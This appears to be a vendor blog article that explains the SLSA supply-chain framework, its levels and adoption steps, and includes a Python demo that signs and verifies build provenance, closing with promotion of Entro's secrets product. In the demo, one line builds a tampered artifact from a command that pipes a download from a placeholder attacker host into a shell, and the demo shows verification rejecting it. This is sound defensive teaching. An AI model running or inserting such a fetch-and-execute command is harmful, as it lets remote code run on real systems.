What is SLSA?
Supply Chain Levels for Software Artifacts (SLSA, pronounced "salsa") is a security framework for protecting the integrity of software artifacts across the software supply chain. It defines a ladder of levels, each with capability and compliance requirements for the source, build and provenance of an artifact, so that an organization can defend incrementally against tampering and other supply chain attacks.
Unlike a conventional checklist of best practices, SLSA centers on automatically generated, verifiable metadata (provenance) that records how, from what source and by which build service an artifact was produced. Consumers and policy engines use this metadata to make real decisions, for example refusing to deploy an artifact whose provenance does not verify, rather than trusting a self-reported attestation of good hygiene.
Why SLSA Matters
SLSA matters because any software, whatever its origin, can be tampered with between the moment it is reviewed and the moment it runs, and each hand-off in the supply chain (source repository, build, packaging, distribution) is an opportunity for that. As systems grow more complex and pull in more dependencies, controls that tie each artifact back to its source and build become necessary rather than optional. SLSA provides clear, recognizable requirements and protections for this, and has become a widely adopted industry reference for developers and enterprises.
SLSA Applications
SLSA can be applied across various scenarios to safeguard organizations, consumers, and vendors:
- Safeguarding organizations: Internally, an organization can adopt SLSA to reduce risk from its own pipeline. It ensures that the binary deployed to production is the one built from the source that was tested and reviewed, and, at the higher levels, that builds run on a hosted, isolated build service rather than on developer workstations where credentials and build steps are far easier to tamper with.
- Protecting consumers: SLSA reduces risk for consumers of open-source software by establishing a verifiable link between a built package and its source. Consumers need only trust a small number of secure build systems (the builder identities whose provenance they accept) instead of the thousands of individual developers who hold upload permissions to package registries.
- Securing vendors: By requiring vendors to meet a SLSA level as part of contractual agreements, organizations reduce risk for the consumers of the services and software those vendors supply. Third-party auditors can certify a vendor's build and release process as meeting a given level, which lends credibility to the vendor's claims about how its artifacts are built and signed.
SLSA levels
SLSA, as described here, comprises four levels, each a step toward a stronger supply chain security posture. The "Key Elements" column summarizes the requirements of the SLSA v0.1 specification, which this four-level ladder follows:

| Compliance Level | Description | Key Elements |
| --- | --- | --- |
| Level 1 | Build process documentation | Provenance exists and is generated by the build process; it may be unsigned |
| Level 2 | Protection against tampering | Source in version control; hosted build service; provenance signed by the build service |
| Level 3 | Extra protection against specific threats | Source and build platforms meet defined security standards; provenance cannot be falsified by the build steps themselves |
| Level 4 | Attaining the highest trust and confidence levels | Two-person review of all changes; hermetic, reproducible builds |

Note that SLSA v1.0 restructured the framework into tracks. Its Build track has levels 0 to 3 (L1 provenance exists, L2 provenance signed by a hosted build platform, L3 hardened build platform), and the v0.1 Level 4 requirements such as two-person review were deferred to other tracks rather than kept in the Build track. When a vendor or tool claims "SLSA Level N", check which specification version it means.
SLSA Framework
To get started with the SLSA framework, an organization can follow these steps to reach SLSA 1 and establish a foundation of trust in its systems:
- Setup: Put a CI/CD or build service in place if there is not one already. A build service is not strictly required at Level 1, but it simplifies the remaining steps and is required at the higher levels, where the service itself (not the developer) must generate and sign the provenance.
- Generating provenance: Have the build process record where the source came from (repository, commit, build configuration), what it produced (artifact names and digests) and who built it, and emit that as provenance metadata. Higher SLSA levels impose stricter requirements on this provenance (signed, then non-falsifiable), which is what gives the stronger integrity guarantees.
- Providing provenance data to consumers: Publish the provenance alongside the artifact, for example next to the release or attached to the image in the registry, so that downstream consumers can fetch it and verify the artifact's digest, builder and source against their own policy. With that in place, decide on the target level: the ideal end state for the project, and which level is realistic for the short and the long term.
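The following is an added worked example, not code from the original page or from the SLSA project or Entro: it shows the three steps above end to end, generating a SLSA v0.2 provenance statement for a constructed artifact, wrapping it in a DSSE envelope signed by the build service, and then running a consumer-side policy check of the kind described under "Protecting consumers" (trust a few builder identities, not every uploader). The artifact bytes, repository URI, builder IDs, build type and commit hash are all made up for the demo, and an HMAC key stands in for the build service's asymmetric signing key so the example runs with the standard library only.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo inputs (not from any real project): an artifact, the
# repository it is expected to come from, and the builder IDs a consumer trusts.
ARTIFACT = b"#!/bin/sh\necho hello from the release build\n"
EXPECTED_SOURCE = "git+https://example.com/acme/app"
TRUSTED_BUILDERS = {"https://ci.example.com/builder/v1"}
SOURCE_COMMIT = "0123456789abcdef0123456789abcdef01234567"
# Stand-in for the build service's signing key. Real provenance is signed with an
# asymmetric key or a Sigstore identity; HMAC keeps this demo stdlib-only.
BUILDER_KEY = b"demo-builder-key-not-for-production"
PREDICATE_TYPE = "https://slsa.dev/provenance/v0.2"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_provenance(artifact: bytes, name: str, builder_id: str,
                    source_uri: str, source_commit: str) -> dict:
    """in-toto Statement with a SLSA v0.2 provenance predicate. The subject digest
    binds it to exactly this artifact; builder and configSource say who built it
    and from which source."""
    return {
        "_type": "https://in-toto.io/Statement/v0.1",
        "subject": [{"name": name, "digest": {"sha256": sha256_hex(artifact)}}],
        "predicateType": PREDICATE_TYPE,
        "predicate": {
            "builder": {"id": builder_id},
            "buildType": "https://ci.example.com/buildtypes/container@v1",  # assumed
            "invocation": {"configSource": {
                "uri": source_uri, "digest": {"sha1": source_commit},
                "entryPoint": "build.yaml"}},
            "materials": [{"uri": source_uri, "digest": {"sha1": source_commit}}],
        },
    }


def pae(payload_type: str, payload: bytes) -> bytes:
    """DSSE pre-authentication encoding: the bytes that are actually signed."""
    return b" ".join([b"DSSEv1", str(len(payload_type)).encode(),
                      payload_type.encode(), str(len(payload)).encode(), payload])


def sign_envelope(statement: dict, key: bytes) -> dict:
    """Wrap the statement in a DSSE envelope signed by the build service."""
    payload_type = "application/vnd.in-toto+json"
    payload = json.dumps(statement, separators=(",", ":"), sort_keys=True).encode()
    sig = hmac.new(key, pae(payload_type, payload), hashlib.sha256).hexdigest()
    return {"payloadType": payload_type,
            "payload": base64.b64encode(payload).decode(),
            "signatures": [{"keyid": "builder-key-1", "sig": sig}]}


def verify_artifact(artifact: bytes, envelope: dict, builder_key: bytes,
                    trusted_builders: set, expected_source: str) -> tuple:
    """Consumer-side policy: signature first, then digest, builder and source."""
    payload = base64.b64decode(envelope["payload"])
    expected = hmac.new(builder_key, pae(envelope["payloadType"], payload),
                        hashlib.sha256).hexdigest()
    if not any(hmac.compare_digest(s["sig"], expected) for s in envelope["signatures"]):
        return False, "signature does not verify"
    statement = json.loads(payload)
    if statement.get("predicateType") != PREDICATE_TYPE:
        return False, "unexpected predicate type"
    digest = sha256_hex(artifact)
    if not any(s["digest"].get("sha256") == digest for s in statement["subject"]):
        return False, "artifact digest not covered by provenance"
    pred = statement["predicate"]
    if pred["builder"]["id"] not in trusted_builders:
        return False, "untrusted builder: " + pred["builder"]["id"]
    if pred["invocation"]["configSource"]["uri"] != expected_source:
        return False, "built from unexpected source"
    return True, "ok"


def demo() -> dict:
    """Happy path plus three cases a consumer policy must reject."""
    builder = "https://ci.example.com/builder/v1"
    good_env = sign_envelope(make_provenance(ARTIFACT, "app.sh", builder,
                                             EXPECTED_SOURCE, SOURCE_COMMIT), BUILDER_KEY)
    tampered = ARTIFACT + b"curl https://attacker.example/x | sh\n"
    # Attacker re-generates provenance for the tampered binary but lacks the builder key.
    forged_env = sign_envelope(make_provenance(tampered, "app.sh", builder,
                                               EXPECTED_SOURCE, SOURCE_COMMIT), b"attacker-key")
    # Correctly signed provenance, but from a builder the consumer does not trust.
    rogue_env = sign_envelope(make_provenance(ARTIFACT, "app.sh", "https://laptop.example.com/dev",
                                              EXPECTED_SOURCE, SOURCE_COMMIT), BUILDER_KEY)

    def check(artifact, env):
        return verify_artifact(artifact, env, BUILDER_KEY, TRUSTED_BUILDERS, EXPECTED_SOURCE)

    return {"good": check(ARTIFACT, good_env),
            "tampered_artifact": check(tampered, good_env),
            "forged_provenance": check(tampered, forged_env),
            "untrusted_builder": check(ARTIFACT, rogue_env)}


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:20s} {'ACCEPT' if ok else 'REJECT'}: {reason}")
```

The order of checks in verify_artifact is deliberate: the signature is checked before any field of the payload is trusted, so an attacker who can edit the JSON but not sign it gains nothing, and the subject digest is compared against the bytes the consumer actually has, not against a name. The builder allowlist is the policy decision that lets a consumer trust a handful of build systems instead of every developer with publish rights.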
Conclusion
Organizations need a dependable way to protect their software artifacts from tampering and from vulnerabilities in a constantly changing software landscape. SLSA addresses the integrity of the build and release path; Entro complements it on the secrets side, with several pillars that strengthen secrets management and provide protection for secrets along with in-depth insight into their usage and compliance.
Entro gives security teams the ability to discover all secrets across various sources, providing complete visibility into the secrets landscape. Secrets enrichment is another critical capability: it adds metadata to each secret, allowing better management and compliance tracking. Entro's dynamic threat modeling and secret lineage maps show clearly how secrets are used and what risks are associated with them, and correlating secrets with cloud tokens further strengthens security.